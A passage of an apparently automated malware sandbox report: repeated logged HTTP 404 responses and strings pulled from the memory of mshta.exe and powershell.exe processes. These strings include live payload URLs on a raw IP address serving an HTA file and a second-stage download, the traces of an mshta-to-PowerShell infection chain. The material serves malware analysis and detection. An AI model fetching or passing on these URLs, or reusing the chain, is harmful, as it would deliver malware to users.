          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:05:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 30 Oct 2024 07:06:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: mshta.exe, 00000004.00000003.431360053.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.00000000035B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/
          Source: mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476212495.0000000000496000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.hta
          Source: mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.hta...
          Source: mshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.hta...3
          Source: mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.hta.eXE
          Source: mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.hta/
          Source: mshta.exe, 0000000F.00000002.477269277.0000000004D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.hta5KWWS
          Source: mshta.exe, 00000004.00000002.433061413.000000000310B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.htaC:
          Source: mshta.exe, 00000004.00000003.431292815.0000000001F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475849306.0000000002095000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472442251.0000000002095000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.htahttp://198.46.178.151/66/gb/greatthingswithmego
          Source: mshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.htalonely&father
          Source: mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.htalonely&fathers
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/gb/greatthingswithmegood.htaly&father
          Source: powershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.484734219.0000000002679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/seemeth
          Source: powershell.exe, 00000011.00000002.484734219.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.491490511.000000001A8FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF
          Source: powershell.exe, 00000011.00000002.491490511.000000001A8FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFC:
          Source: powershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.484734219.0000000002679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFp
          Source: mshta.exe, 0000000F.00000002.476996114.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.00000000035B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/c
          Source: mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
